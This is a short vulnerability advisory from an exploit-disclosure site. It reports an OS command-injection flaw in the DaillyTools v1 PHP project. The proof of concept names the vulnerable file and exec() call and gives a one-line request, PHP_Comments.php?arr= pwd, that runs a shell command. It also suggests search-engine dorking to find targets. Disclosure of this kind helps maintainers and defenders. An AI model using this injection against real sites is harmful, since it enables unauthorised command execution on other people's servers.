DaillyTools Remote Command Execution

2023.07.11
Credit: indoushka
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

==================================================================================================================================== | # Title : DaillyTools v1 command execution Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://github.com/islamoc/DaillyTools | | # Dork : Coded by Mennouchi Islam Azeddine | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected file : PHP_Comments.php [+] Line : 20 Function Name : exec Variables :$arr [+] PHP_Comments.php?arr= pwd Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================


Vote for this issue:
75%
25%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top